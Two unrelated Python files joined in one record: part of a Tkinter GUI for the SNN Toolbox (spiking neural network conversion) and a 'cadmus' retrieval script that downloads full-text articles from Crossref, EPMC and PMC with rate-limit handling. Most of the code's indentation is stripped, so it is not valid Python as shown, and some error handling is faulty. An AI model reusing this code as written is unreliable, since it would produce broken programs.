command=dataset_settings_container.destroy).pack()
datagen_frame = tk.Frame(dataset_settings_container, bg='white')
datagen_frame.pack(**self.kwargs)
tk.Label(datagen_frame, text="Datagen kwargs:", bg='white').pack(
fill='both', expand=True)
datagen_settings_entry = tk.Entry(
datagen_frame, bg='white', width=20,
textvariable=self.settings['datagen_kwargs'])
datagen_settings_entry.pack(expand=True, fill='x')
tip = dedent("""\
Specify keyword arguments for the data generator that will be used
to load image files from subdirectories in the 'dataset_path'.
Need to be given in form of a python dictionary. See Keras
'ImageDataGenerator' for possible values.""")
ToolTip(datagen_frame, text=tip, wraplength=750)
dataflow_frame = tk.Frame(dataset_settings_container, bg='white')
dataflow_frame.pack(**self.kwargs)
tk.Label(dataflow_frame, text="Dataflow kwargs:", bg='white').pack(
fill='both', expand=True)
dataflow_settings_entry = tk.Entry(
dataflow_frame, bg='white', width=20,
textvariable=self.settings['dataflow_kwargs'])
dataflow_settings_entry.pack(expand=True, fill='x')
tip = dedent("""\
Specify keyword arguments for the data flow that will get the
samples from the ImageDataGenerator.
Need to be given in form of a python dictionary. See
keras.preprocessing.image.ImageDataGenerator.flow_from_directory
            for possible values. Note that the 'directory' argument need not
be given because it is set to 'dataset_path' automatically.""")
ToolTip(dataflow_frame, text=tip, wraplength=750)
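    # Illustrative examples of the two dictionaries above (the values are assumptions
    # for the sake of the example, not toolbox defaults):
    #   Datagen kwargs:  {'rescale': 1. / 255, 'horizontal_flip': True}
    #   Dataflow kwargs: {'target_size': (28, 28), 'batch_size': 32}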
def graph_widgets(self):
"""Create graph widgets."""
# Create a container for buttons that display plots for individual
# layers.
if hasattr(self, 'graph_frame'):
self.graph_frame.pack_forget()
self.graph_frame.destroy()
self.graph_frame = tk.Frame(self.main_container, background='white')
self.graph_frame.pack(side='left', fill=None, expand=False)
tip = dedent("""\
Select a layer to display plots like Spiketrains, Spikerates,
Membrane Potential, Correlations, etc.""")
ToolTip(self.graph_frame, text=tip, wraplength=750)
self.select_plots_dir_rb()
if hasattr(self, 'selected_plots_dir'):
self.select_layer_rb()
def select_plots_dir_rb(self):
"""Select plots directory."""
self.plot_dir_frame = tk.LabelFrame(self.graph_frame, labelanchor='nw',
text="Select dir", relief='raised',
borderwidth='3', bg='white')
self.plot_dir_frame.pack(side='top', fill=None, expand=False)
self.gui_log.set(os.path.join(self.settings['path_wd'].get(),
'log', 'gui'))
if os.path.isdir(self.gui_log.get()):
plot_dirs = [d for d in sorted(os.listdir(self.gui_log.get()))
if os.path.isdir(os.path.join(self.gui_log.get(), d))]
self.selected_plots_dir = tk.StringVar(value=plot_dirs[0])
[tk.Radiobutton(self.plot_dir_frame, bg='white', text=name,
value=name, command=self.select_layer_rb,
variable=self.selected_plots_dir).pack(
fill='both', side='bottom', expand=True)
for name in plot_dirs]
open_new_cb = tk.Checkbutton(self.graph_frame, bg='white', height=2,
width=20, text='open in new window',
variable=self.settings['open_new'])
open_new_cb.pack(**self.kwargs)
tip = dedent("""\
If unchecked, the window showing graphs for a certain layer will
close and be replaced each time you select a layer to plot.
If checked, an additional window will pop up instead.""")
ToolTip(open_new_cb, text=tip, wraplength=750)
def select_layer_rb(self):
"""Select layer."""
if hasattr(self, 'layer_frame'):
self.layer_frame.pack_forget()
self.layer_frame.destroy()
self.layer_frame = tk.LabelFrame(self.graph_frame, labelanchor='nw',
text="Select layer", relief='raised',
borderwidth='3', bg='white')
self.layer_frame.pack(side='bottom', fill=None, expand=False)
self.plots_dir = os.path.join(self.gui_log.get(),
self.selected_plots_dir.get())
if os.path.isdir(self.plots_dir):
layer_dirs = [d for d in sorted(os.listdir(self.plots_dir))
if d != 'normalization' and
os.path.isdir(os.path.join(self.plots_dir, d))]
[tk.Radiobutton(self.layer_frame, bg='white', text=name,
value=name, command=self.display_graphs,
variable=self.layer_to_plot).pack(
fill='both', side='bottom', expand=True)
for name in layer_dirs]
def draw_canvas(self):
"""Draw canvas figure."""
# Create figure with subplots, a canvas to hold them, and add
# matplotlib navigation toolbar.
        if self.layer_to_plot.get() == '':
return
if hasattr(self, 'plot_container') \
and not self.settings['open_new'].get() \
and not self.is_plot_container_destroyed:
self.plot_container.wm_withdraw()
self.plot_container = tk.Toplevel(bg='white')
self.plot_container.geometry('1920x1080')
self.is_plot_container_destroyed = False
self.plot_container.wm_title('Results from simulation run {}'.format(
self.selected_plots_dir.get()))
self.plot_container.protocol('WM_DELETE_WINDOW', self.close_window)
tk.Button(self.plot_container, text='Close Window',
command=self.close_window).pack()
f = plt.figure(figsize=(30, 15))
f.subplots_adjust(left=0.01, bottom=0.05, right=0.99, top=0.99,
wspace=0.01, hspace=0.01)
num_rows = 3
num_cols = 5
gs = gridspec.GridSpec(num_rows, num_cols)
self.a = [plt.subplot(gs[i, 0:-2]) for i in range(3)]
self.a += [plt.subplot(gs[i, -2]) for i in range(3)]
self.a += [plt.subplot(gs[i, -1]) for i in range(3)]
self.canvas = FigureCanvasTkAgg(f, self.plot_container)
graph_widget = self.canvas.get_tk_widget()
graph_widget.pack(side='top', fill='both', expand=True)
self.toolbar = NavigationToolbar2TkAgg(self.canvas, graph_widget)
def close_window(self):
"""Close window function."""
plt.close()
self.plot_container.destroy()
self.is_plot_container_destroyed = True
def display_graphs(self):
"""Display graphs."""
self.draw_canvas()
        if self.layer_to_plot.get() == '':
msg = ("Failed to load images. Please select a layer to plot, and "
"make sure your working directory contains appropriate "
"image files.")
messagebox.showerror(title="Loading Error", message=msg)
return
path_to_plots = os.path.join(self.plots_dir, self.layer_to_plot.get())
if not os.path.isdir(path_to_plots):
msg = ("Failed to load images. Please set a working directory "
"that contains appropriate image files.")
messagebox.showerror(title="Loading Error", message=msg)
return
saved_plots = sorted(os.listdir(path_to_plots))
[a.clear() for a in self.a]
for name in saved_plots:
i = int(name[:1])
self.a[i].imshow(mpimg.imread(os.path.join(path_to_plots, name)))
layer_idx = int(self.layer_to_plot.get()[:2])
plots_dir_norm = os.path.join(self.plots_dir, 'normalization')
if os.path.exists(plots_dir_norm):
normalization_plots = sorted(os.listdir(plots_dir_norm))
else:
normalization_plots = []
activation_distr = None
weight_distr = None
for i in range(len(normalization_plots)):
if int(normalization_plots[i][:2]) == layer_idx:
activation_distr = normalization_plots[i]
weight_distr = normalization_plots[i + 1]
break
if activation_distr and weight_distr:
self.a[3].imshow(mpimg.imread(os.path.join(self.plots_dir,
'normalization',
activation_distr)))
self.a[6].imshow(mpimg.imread(os.path.join(self.plots_dir,
'normalization',
weight_distr)))
self.a[-1].imshow(mpimg.imread(os.path.join(self.plots_dir,
'Pearson.png')))
for a in self.a:
a.get_xaxis().set_visible(False)
a.get_yaxis().set_visible(False)
self.canvas.draw()
self.toolbar.update()
# noinspection PyProtectedMember
self.canvas._tkcanvas.pack(side='left', fill='both', expand=True)
def top_level_menu(self):
"""Top level menu settings."""
menubar = tk.Menu(self.root)
self.root.config(menu=menubar)
filemenu = tk.Menu(menubar, tearoff=0)
filemenu.add_command(label="Save preferences",
command=self.save_settings)
filemenu.add_command(label="Load preferences",
command=self.load_settings)
filemenu.add_command(label="Restore default preferences",
command=self.restore_default_params)
filemenu.add_separator()
filemenu.add_command(label="Quit", command=self.quit_toolbox)
menubar.add_cascade(label="File", menu=filemenu)
editmenu = tk.Menu(menubar, tearoff=0)
editmenu.add_command(label='Experimental settings',
command=self.edit_experimental_settings)
editmenu.add_command(label='Normalization settings',
command=self.edit_normalization_settings)
editmenu.add_command(label='Dataset settings',
command=self.edit_dataset_settings)
menubar.add_cascade(label='Edit', menu=editmenu)
helpmenu = tk.Menu(menubar, tearoff=0)
helpmenu.add_command(label="About", command=self.about)
helpmenu.add_command(label="Documentation", command=self.documentation)
menubar.add_cascade(label="Help", menu=helpmenu)
@staticmethod
def documentation():
"""Open documentation."""
webbrowser.open(os.path.join(sys.exec_prefix, 'docs',
'Documentation.html'))
@staticmethod
def about():
"""About message."""
msg = ("This is a collection of tools to convert analog neural "
"networks to fast and high-performing spiking nets.\n\n"
"Developed at the Institute of Neuroinformatics, \n"
"University / ETH Zurich.\n\n"
"Contact: Bodo Rueckauer \n"
"bodo.rueckauer@gmail.com \n\n"
"Version: {} \n\n".format('0.1dev') +
"2016")
messagebox.showinfo(title="About SNN Toolbox", message=msg)
def quit_toolbox(self):
"""Quit toolbox function."""
self.store_last_settings = True
self.save_settings()
self.root.destroy()
self.root.quit()
def declare_parameter_vars(self):
"""Preferenece collection."""
# These will be written to disk as preferences.
self.settings = {'dataset_path': tk.StringVar(),
'dataset_format': tk.StringVar(),
'datagen_kwargs': tk.StringVar(),
'dataflow_kwargs': tk.StringVar(),
'model_lib': tk.StringVar(),
'path_wd': tk.StringVar(value=self.toolbox_root),
'filename_parsed_model': tk.StringVar(),
'filename_ann': tk.StringVar(),
'filename_snn': tk.StringVar(),
'batch_size': tk.IntVar(),
'sample_idxs_to_test': tk.StringVar(),
'evaluate_ann': tk.BooleanVar(),
'normalize': tk.BooleanVar(),
'percentile': tk.DoubleVar(),
'convert': tk.BooleanVar(),
'simulate': tk.BooleanVar(),
'overwrite': tk.BooleanVar(),
'verbose': tk.IntVar(),
'v_thresh': tk.DoubleVar(),
'tau_refrac': tk.DoubleVar(),
'v_reset': tk.DoubleVar(),
'v_rest': tk.DoubleVar(),
'e_rev_E': tk.DoubleVar(),
'e_rev_I': tk.DoubleVar(),
'i_offset': tk.IntVar(),
'cm': tk.DoubleVar(),
'tau_m': tk.IntVar(),
'tau_syn_E': tk.DoubleVar(),
'tau_syn_I': tk.DoubleVar(),
'dt': tk.DoubleVar(),
'simulator': tk.StringVar(),
'duration': tk.IntVar(),
'poisson_input': tk.BooleanVar(),
'num_poisson_events_per_sample': tk.IntVar(),
'num_dvs_events_per_sample': tk.IntVar(),
'eventframe_width': tk.IntVar(),
'label_dict': tk.Variable(),
'chip_size': tk.Variable(),
'target_size': tk.Variable(),
'reset': tk.StringVar(),
'input_rate': tk.IntVar(),
'diff_to_max_rate': tk.IntVar(),
'timestep_fraction': tk.IntVar(),
'diff_to_min_rate': tk.IntVar(),
'delay': tk.IntVar(),
'num_to_test': tk.IntVar(),
'runlabel': tk.StringVar(),
'open_new': tk.BooleanVar(value=True),
'log_dir_of_current_run': tk.StringVar(),
'state_pyNN': tk.StringVar(value='normal'),
'state_num_to_test': tk.StringVar(value='normal'),
'experimental_settings': tk.BooleanVar(),
'online_normalization': tk.BooleanVar(),
'normalization_schedule': tk.BooleanVar(),
'scaling_factor': tk.IntVar(),
'maxpool_type': tk.StringVar(),
'max2avg_pool': tk.BooleanVar(),
'payloads': tk.BooleanVar(),
'binarize_weights': tk.BooleanVar(),
'custom_activation': tk.StringVar(),
'softmax_to_relu': tk.BooleanVar(),
'reset_between_nth_sample': tk.IntVar(),
'filename_clamp_indices': tk.StringVar(),
'log_vars': tk.Variable(),
'plot_vars': tk.Variable()}
# These will not be written to disk as preferences.
self.is_plot_container_destroyed = True
self.store_last_settings = False
self.restore_last_pref = True
self.layer_rb_set = False
self.layer_rbs = []
self.layer_to_plot = tk.StringVar()
self.start_state = tk.StringVar(value='normal')
self.stop_state = tk.StringVar(value='normal')
self.percentile_state = tk.StringVar()
self.poisson_input_state = tk.StringVar()
self.console_output = tk.StringVar()
self.gui_log = tk.StringVar()
def restore_default_params(self):
"""Restore default parameters."""
self.set_preferences(self.config)
self.toggle_state_pynn(self.settings['simulator'].get())
def set_preferences(self, p):
"""Set preferences."""
[self.settings[key].set(p[key]) for key in p]
        if self.settings['path_wd'].get() == '':
            self.settings['path_wd'].set(os.getcwd())
def save_settings(self):
"""Save current settings."""
s = {key: self.settings[key].get() for key in self.settings}
if self.store_last_settings:
if not os.path.exists(self.default_path_to_pref):
os.makedirs(self.default_path_to_pref)
with open(os.path.join(self.default_path_to_pref,
'_last_settings.json'), 'w') as f:
f.write(json.dumps(s))
self.store_last_settings = False
else:
path_to_pref = filedialog.asksaveasfilename(
defaultextension='.json', filetypes=[("json files", '*.json')],
initialdir=self.default_path_to_pref,
title="Choose filename")
with open(path_to_pref, 'w') as f:
f.write(json.dumps(s))
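    # The saved JSON is a flat mapping of the keys declared in declare_parameter_vars
    # to their current values, e.g. (values shown here are illustrative only):
    #   {"simulator": "INI", "batch_size": 32, "duration": 100, "poisson_input": true, ...}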
def load_settings(self, s=None):
"""Load a perferences settings."""
if s is None:
if self.restore_last_pref:
self.restore_last_pref = False
if not os.path.isdir(self.default_path_to_pref):
return
path_to_pref = os.path.join(self.default_path_to_pref,
'_last_settings.json')
if not os.path.isfile(path_to_pref):
return
else:
path_to_pref = filedialog.askopenfilename(
defaultextension='.json', filetypes=[("json files",
'*.json')],
initialdir=self.default_path_to_pref,
title="Choose filename")
s = json.load(open(path_to_pref))
self.set_preferences(s)
def start_processing(self):
"""Start processing."""
if self.settings['filename_ann'].get() == '':
messagebox.showwarning(title="Warning",
message="Please specify a filename base.")
return
if self.settings['dataset_path'].get() == '':
messagebox.showwarning(title="Warning",
message="Please set the dataset path.")
return
self.store_last_settings = True
self.save_settings()
self.check_runlabel(self.settings['runlabel'].get())
self.config.read_dict(self.settings)
self.initialize_thread()
self.process_thread.start()
self.toggle_start_state(True)
self.update()
def stop_processing(self):
"""Stop processing."""
if self.process_thread.is_alive():
self.res_queue.put('stop')
self.toggle_stop_state(True)
def update(self):
"""Update GUI with items from the queue."""
if self.process_thread.is_alive():
# Schedule next update
self.root.after(1000, self.update)
else:
# Stop loop of watching process_thread.
self.toggle_start_state(False)
self.toggle_stop_state(False)
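    # Processing pattern: start_processing launches test_full in the daemon thread
    # created by initialize_thread, then update() re-schedules itself once per second
    # via root.after() while that thread is alive. stop_processing signals the worker
    # by putting 'stop' on res_queue, so it exits between pipeline steps rather than
    # being killed immediately.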
def check_sample(self, p):
"""Check samples."""
if not self.initialized:
return True
elif p == '':
self.toggle_num_to_test_state(True)
return True
elif False:
# Put some other tests here
return False
else:
samples = [int(i) for i in p.split() if i.isnumeric()]
self.settings['num_to_test'].set(len(samples))
self.toggle_num_to_test_state(False)
return True
def check_file(self, p):
"""Check files."""
if not os.path.exists(self.settings['path_wd'].get()) or \
not any(p in fname for fname in
os.listdir(self.settings['path_wd'].get())):
msg = ("Failed to set filename base:\n"
"Either working directory does not exist or contains no "
"files with base name \n '{}'".format(p))
messagebox.showwarning(title="Warning", message=msg)
return False
else:
return True
def check_path(self, p):
"""Check path."""
if not self.initialized:
result = True
elif not os.path.exists(p):
msg = "Failed to set working directory:\n" + \
"Specified directory does not exist."
messagebox.showwarning(title="Warning", message=msg)
result = False
elif self.settings['model_lib'].get() == 'caffe':
if not any(fname.endswith('.caffemodel') for fname in
os.listdir(p)):
msg = "No '*.caffemodel' file found in \n {}".format(p)
messagebox.showwarning(title="Warning", message=msg)
result = False
elif not any(fname.endswith('.prototxt') for fname in
os.listdir(p)):
msg = "No '*.prototxt' file found in \n {}".format(p)
messagebox.showwarning(title="Warning", message=msg)
result = False
else:
result = True
elif not any(fname.endswith('.json') for fname in os.listdir(p)):
msg = "No model file '*.json' found in \n {}".format(p)
messagebox.showwarning(title="Warning", message=msg)
result = False
else:
result = True
if result:
self.settings['path_wd'].set(p)
self.gui_log.set(os.path.join(p, 'log', 'gui'))
# Look for plots in working directory to display
self.graph_widgets()
return result
def check_runlabel(self, p):
"""Check runlabel."""
if self.initialized:
# Set path to plots for the current simulation run
self.settings['log_dir_of_current_run'].set(
os.path.join(self.gui_log.get(), p))
if not os.path.exists(
self.settings['log_dir_of_current_run'].get()):
os.makedirs(self.settings['log_dir_of_current_run'].get())
def check_dataset_path(self, p):
"""
Parameters
----------
p :
Returns
-------
"""
if not self.initialized:
result = True
elif not os.path.exists(p):
msg = "Failed to set dataset directory:\n" + \
"Specified directory does not exist."
messagebox.showwarning(title="Warning", message=msg)
result = False
elif self.settings['normalize'] and \
self.settings['dataset_format'] == 'npz' and not \
os.path.exists(os.path.join(p, 'x_norm.npz')):
msg = "No data set file 'x_norm.npz' found.\n" + \
"Add it, or disable normalization."
messagebox.showerror(title="Error", message=msg)
result = False
elif self.settings['dataset_format'] == 'npz' and not \
(os.path.exists(os.path.join(p, 'x_test.npz')) and
os.path.exists(os.path.join(p, 'y_test.npz'))):
msg = "Data set file 'x_test.npz' or 'y_test.npz' was not found."
messagebox.showerror(title="Error", message=msg)
result = False
else:
result = True
if result:
self.settings['dataset_path'].set(p)
return result
def set_cwd(self):
"""Set current working directory."""
p = filedialog.askdirectory(title="Set directory",
initialdir=self.toolbox_root)
self.check_path(p)
def set_dataset_path(self):
"""Set path to dataset."""
p = filedialog.askdirectory(title="Set directory",
initialdir=self.toolbox_root)
self.check_dataset_path(p)
def __scroll_handler(self, *l):
op, how_many = l[0], l[1]
if op == 'scroll':
units = l[2]
self.path_entry.xview_scroll(how_many, units)
elif op == 'moveto':
self.path_entry.xview_moveto(how_many)
def toggle_state_pynn(self, val):
"""Toogle state for pyNN."""
simulators_pynn = eval(self.config.get('restrictions', 'simulators_pyNN'))
if val not in list(simulators_pynn) + ['brian2']:
self.settings['state_pyNN'].set('disabled')
else:
self.settings['state_pyNN'].set('normal')
# for name in pyNN_keys:
# getattr(self, name + '_label').configure(
# state=self.settings['state_pyNN'].get())
# getattr(self, name + '_sb').configure(
# state=self.settings['state_pyNN'].get())
def toggle_start_state(self, val):
"""Toggle start state."""
if val:
self.start_state.set('disabled')
else:
self.start_state.set('normal')
self.start_processing_bt.configure(state=self.start_state.get())
def toggle_stop_state(self, val):
"""Toggle stop state."""
if val:
self.stop_state.set('disabled')
else:
self.stop_state.set('normal')
self.stop_processing_bt.configure(state=self.stop_state.get())
def toggle_num_to_test_state(self, val):
"""Toggle number to test state."""
if val:
self.settings['state_num_to_test'].set('normal')
else:
self.settings['state_num_to_test'].set('disabled')
self.num_to_test_label.configure(
state=self.settings['state_num_to_test'].get())
self.num_to_test_sb.configure(
state=self.settings['state_num_to_test'].get())
def toggle_poisson_input_state(self):
"""Toggle poisson input."""
if self.settings['poisson_input'].get():
self.poisson_input_state.set('normal')
else:
self.poisson_input_state.set('disabled')
self.input_rate_label.configure(state=self.poisson_input_state.get())
self.input_rate_sb.configure(state=self.poisson_input_state.get())
def main():
from snntoolbox.bin.utils import load_config
config = load_config(os.path.abspath(os.path.join(os.path.dirname(__file__),
'..', '..', 'snntoolbox',
'config_defaults')))
root = tk.Tk()
root.title("SNN Toolbox")
app = SNNToolboxGUI(root, config)
root.protocol('WM_DELETE_WINDOW', app.quit_toolbox)
root.mainloop()
if __name__ == '__main__':
# main_thread = threading.Thread(target=main, name='main thread')
# main_thread.setDaemon(True)
# main_thread.start()
main()
|
retrieval.py
|
from cadmus.retrieval.get_request import get_request
from cadmus.parsing.xml_response_to_parse_d import xml_response_to_parse_d
from cadmus.parsing.doctype import doctype
from cadmus.evaluation.evaluation_funct import evaluation_funct
from cadmus.retrieval.complete_html_link_parser import complete_html_link_parser
from cadmus.parsing.html_response_to_parse_d import html_response_to_parse_d
from cadmus.parsing.pdf_file_to_parse_d import pdf_file_to_parse_d
from cadmus.parsing.plain_file_to_parse_d import plain_file_to_parse_d
from cadmus.parsing.tgz_unpacking import tgz_unpacking
from cadmus.retrieval.pubmed_linkout_parse import pubmed_linkout_parse
from cadmus.retrieval.clear import clear
from cadmus.retrieval.timeout import timeout
import bs4
from bs4 import BeautifulSoup
import pickle
import urllib.request as request
from contextlib import closing
import shutil
import wget
import time
from time import sleep
import warnings
warnings.filterwarnings("ignore")
from multiprocessing import Process
import pandas as pd
def retrieval(retrieval_df, http, base_url, headers, stage, keep_abstract, done = None):
    # the input is the retrieved_df; each stage is subset so that the required identifier is always available (doi, pmid or pmcid)
    # the counter variable keeps track of when to save the current result: every 100 rows or when a step is completed
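    # a hedged usage sketch (parameter names are the function's own; values are purely illustrative):
    #   retrieved_df = retrieval(retrieved_df, http, base_url, headers, 'crossref', keep_abstract)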
counter = 0
    # subset the original df to the rows that have the relevant identifier (PMCID, PMID or DOI), to minimise the time spent
if stage == 'crossref':
condition = []
for i in range(len(retrieval_df)):
if len(retrieval_df.iloc[i]['full_text_links'].get('cr_tdm')) > 0:
condition.append(True)
else:
condition.append(False)
cr_df = retrieval_df[condition]
elif stage == 'epmcxml' or stage == 'epmcsupp' or stage == 'pmcxmls' or stage == 'pmcpdfs' or stage == 'pmctgz':
condition = [(type(pmcid) != float) for pmcid in retrieval_df.pmcid]
cr_df = retrieval_df[condition]
elif stage == 'doiorg':
condition = [(type(doi) != float) for doi in retrieval_df.doi]
cr_df = retrieval_df[condition]
elif stage == 'pubmed':
condition = [(type(pmid) != float) for pmid in retrieval_df.pmid]
cr_df = retrieval_df[condition]
else:
        print('There is an error in the stage identification, please file a bug report')
exit()
for index, row in cr_df.iterrows():
if counter == 0:
#cleaning the terminal windows
clear()
#showing on top of the screen what to put in case of failure
            print(f'In case of failure please put the parameters start="{stage}" (or "{stage}_only" if in only mode) and idx="{index}"')
# save the last stage and index where we saved the df
saved_stage = stage
saved_index = index
print('\n')
counter += 1
if stage == 'crossref':
            # printing the number of rows remaining in the crossref step
print('Downloading Crossref TDM links now...')
print(f'tdm full link {counter} of {len(cr_df)}')
elif stage == 'epmcxml' or stage == 'epmcsupp' or stage == 'pmcxmls' or stage == 'pmcpdfs' or stage == 'pmctgz':
            # checking that the PMCID is not nan; the PMCID is the key needed for the EPMC and PMC steps
if retrieval_df.pmcid.loc[index] == retrieval_df.pmcid.loc[index]:
pmcid = row['pmcid']
print(f'Looking for {pmcid} which is record {counter} of {len(cr_df)}')
if stage == 'pmcxmls' or stage == 'pmcpdfs':
                    # formatting the value into the form expected by these APIs
pmcid = pmcid.replace('PMC', '')
else:
pass
else:
pass
elif stage == 'doiorg':
# checking the DOI is not nan
if retrieval_df.doi.loc[index] == retrieval_df.doi.loc[index]:
#extracting the doi needed for doiorg
doi = row['doi']
print(f'DOI {counter} of {len(cr_df)}')
else:
pass
elif stage == 'pubmed':
# checking the pmid is not nan
if retrieval_df.pmid.loc[index] == retrieval_df.pmid.loc[index]:
#extracting the pmid needed for the pubmed step
pmid = row['pmid']
print(f'working on pmid:{pmid}, record {counter} of {len(cr_df)}')
else:
pass
else:
pass
if stage == 'crossref':
#collect all the crossref links available for text mining
links = row['full_text_links'].get('cr_tdm')
if links:
for link in links:
                    # trying to identify the format from the link, so we do not request a document already retrieved in that format
if ('.pdf' in link and retrieval_df.pdf.loc[index] == 1) or ('.xml' in link and retrieval_df.xml.loc[index] == 1) or ('plain' in link and retrieval_df.plain.loc[index] == 1):
pass
else:
#printing the link we are trying to download from
print(f'trying to download from: \n{link}')
try:
                            # requesting the document by creating the header and the request
response_d, response = get_request('', http, link, headers, 'crossref')
except:
pass
# we don't want to get the IP address blocked by the publisher so need to check responses to each request
# some publishers may not use the correct headers and might be missed
# in which case we need to look out for any "too many requests" response
if response_d['status_code'] == 429:
print('"Too many requests error [429]" received')
print('Risk of IP address block: stopping script')
print(response_d['text'])
exit()
elif response_d['status_code'] == 200:
print('Request ok')
# This section looks for limit header from publisher API as set out on Crossref docs
# check to see if there has been a limit set
                            rate_limit = response.headers.get('CR-TDM-Rate-Limit')
                            if rate_limit:
                                print(f'Rate limit found = {rate_limit} / sec')
                                # if we find a rate limit we can also look out for the remaining allowance
                                limit_reset = response.headers.get('CR-TDM-Rate-Limit-Reset')
                                if limit_reset:
                                    # now check to see if we have met the download limit
                                    limit_remaining = response.headers.get('CR-TDM-Rate-Limit-Remaining')
if limit_remaining:
if int(limit_remaining) == 0:
print('download limit reached, need to back off')
sleep(int(limit_reset))
# now lets look for the content type of the response
                            format_type = response.headers.get('Content-Type')
                            if format_type is None:
                                soup = BeautifulSoup(response.text)
                                format_type = doctype(soup)
                            if format_type is None:
                                # fall back to an empty string so the substring checks below do not fail
                                format_type = ''
                            print(f'Format:{format_type} found')
                            # in case the link suggests it points to a pdf format
if ('pdf' in format_type.lower()) or ('.pdf' in link):
                                # checking whether the pdf was already retrieved; if not we will try, otherwise we go to the next record
if retrieval_df.pdf.loc[index] != 1:
                                    # checking whether the document retrieved is really a pdf
if response_d['headers']['Content-Type'] == 'application/pdf':
with open(f'./output/formats/pdfs/{index}.pdf', 'wb') as file:
                                            # saving the file to the appropriate path
file.write(response.content)
try:
                                            # inspecting the content of the pdf; if it shows evidence of being the full text, we update the df with the new information
pdf_d = pdf_file_to_parse_d(retrieval_df, index, f'./output/formats/pdfs/{index}.pdf', link, keep_abstract)
if pdf_d['Content_type'] == 'pdf' and pdf_d['text'] != '' and (len(pdf_d['abstract'].split()) < pdf_d['wc'] or len(pdf_d['abstract'].split()) > 1000 if pdf_d['abstract'] != None else True) and 100 < pdf_d['wc']:
# we change the value to 1 in order to not look for that format again
retrieval_df.loc[index, 'pdf'] = 1
retrieval_df.loc[index, 'pdf_parse_d'] = [pdf_d]
else:
pass
except:
pass
else:
pass
else:
pass
                            # trying to identify whether the link will provide the algorithm with an xml format
elif ('xml' in format_type.lower()) or ('.xml' in link):
# the algorithm will spend time on the following only if it has not retrieved it already
if retrieval_df.xml.loc[index] != 1:
# perform xml parsing and FP detection
xml_d = xml_response_to_parse_d(retrieval_df, index, response, keep_abstract)
xml_d = evaluation_funct(xml_d)
# now we have the xml_d we can evaluate to decide if it is a TP, FP or AB
if xml_d['evaluation'] == 'TP' and (len(xml_d['abstract'].split()) < xml_d['wc'] or len(xml_d['abstract'].split()) > 1000 if xml_d['abstract'] != None else True) and 100 < xml_d['wc']:
with open(f'./output/formats/xmls/{index}.xml', 'w') as file:
                                        # saving the file to a pre-defined directory as we identified it as TP
file.write(response.text.encode('ascii', 'ignore').decode())
# changing the value to one for future references
retrieval_df.loc[index,'xml'] = 1
retrieval_df.loc[index,'xml_parse_d'] = [xml_d]
else:
pass
else:
pass
elif 'html' in format_type.lower():
# the function will spend time to the following only if no html were saved before
if retrieval_df.html.loc[index] != 1:
# all the htmls should be checked for candidate link(s) regardless of whether they are FP or AB
html_links = complete_html_link_parser(response)
# list of potential candidate links
if len(html_links) != 0:
# the dictionary that contains the list is updated as we try new pages
full_text_link_dict = retrieval_df.loc[index, 'full_text_links']
full_text_link_dict.update({'html_parse':html_links})
retrieval_df.at[index, 'full_text_links'] = full_text_link_dict
# perform html parsing and FP detection
html_d = html_response_to_parse_d(retrieval_df, index, response, keep_abstract)
html_d = evaluation_funct(html_d)
# now we have the html_d we can evaluate to decide if it is a TP, FP or AB
if html_d['evaluation'] == 'TP' and (len(html_d['abstract'].split()) < html_d['wc'] or len(html_d['abstract'].split()) > 1000 if html_d['abstract'] != None else True) and 100 < html_d['wc']:
with open(f'./output/formats/htmls/{index}.html', 'w') as file:
                                        # since the file has been identified as TP we save it to a pre-defined structure
file.write(response.text.encode('ascii', 'ignore').decode())
retrieval_df.loc[index,'html'] = 1
retrieval_df.loc[index,'html_parse_d'] = [html_d]
else:
pass
else:
pass
#doing the same as before for .txt file format
elif 'plain' in format_type.lower():
if retrieval_df.plain.loc[index] != 1:
with open(f'./output/formats/txts/{index}.txt', 'w') as file:
file.write(response.text.encode('ascii', 'ignore').decode())
plain_d = plain_file_to_parse_d(retrieval_df, index, f'./output/formats/txts/{index}.txt', link, keep_abstract)
if plain_d['text'] != '' and (len(plain_d['abstract'].split()) < plain_d['wc'] or len(plain_d['abstract'].split()) > 1000 if plain_d['abstract'] != None else True) and 100 < plain_d['wc']:
retrieval_df.loc[index, 'plain_parse_d'] = [plain_d]
retrieval_df.loc[index,'plain'] = 1
else:
pass
else:
# request failed, move on to the next one
pass
else:
                # no crossref tdm links for this record
print('No Crossref links for this article')
pass
elif stage == 'epmcxml':
            # if the xml is already retrieved or the identifier is missing, go to the next record
if retrieval_df.xml.loc[index] != 1 and retrieval_df.pmcid.loc[index] == retrieval_df.pmcid.loc[index]:
try:
                    # creating the header and the protocol to retrieve the file from the EPMC API
response_d, response = get_request(pmcid, http, base_url, headers, 'epmcxml')
except:
pass
                # if the status code we get from the server is 429, we notify the user and stop the process to give it some time to rest
if response_d['status_code'] == 429:
print('"Too many requests error [429]" received')
print('Risk of IP address block: stopping script')
exit()
#if status code is 200, it means everything works correctly
elif response_d['status_code'] == 200:
# perform xml parsing and FP detection
xml_d = xml_response_to_parse_d(retrieval_df, index, response, keep_abstract)
xml_d = evaluation_funct(xml_d)
                    # now that we have the xml_d we can look at the parsed text to decide whether it is a TP, FP or AB class
if xml_d['evaluation'] == 'TP' and (len(xml_d['abstract'].split()) < xml_d['wc'] or len(xml_d['abstract'].split()) > 1000 if xml_d['abstract'] != None else True) and 100 < xml_d['wc']:
print('success, now writing to file')
                        # the file has been classified as TP, saving the file
with open(f'./output/formats/xmls/{index}.xml', 'w+') as file:
file.write(response_d['text'].encode('ascii', 'ignore').decode())
                        # we can keep track of the successes as we go by saving 1 to the xml column and avoid trying again
retrieval_df.loc[index,'xml'] = 1
retrieval_df.loc[index,'xml_parse_d'] = [xml_d]
else:
print('error with request')
print(f'{response_d["error"]}')
else:
pass
elif stage == 'pmcxmls':
            # if the xml is already retrieved, or the identifier is missing, go to the next record
if retrieval_df.xml.loc[index] != 1 and retrieval_df.pmcid.loc[index] == retrieval_df.pmcid.loc[index]:
try:
                    # creating the header and protocol to retrieve the document from the PMC API
response_d, response = get_request(pmcid, http, base_url, headers, 'pmcxmls')
except:
pass
                # if the error code is 429, stopping the process to give it time to rest
if response_d['status_code'] == 429:
print('"Too many requests error [429]" received')
print('Risk of IP address block: stopping script')
exit()
# code 200 everything works correctly
elif response_d['status_code'] == 200:
# perform xml parsing and FP detection
xml_d = xml_response_to_parse_d(retrieval_df, index, response, keep_abstract)
xml_d = evaluation_funct(xml_d)
# now we have the xml_d we can decide if it is a TP, FP or AB class
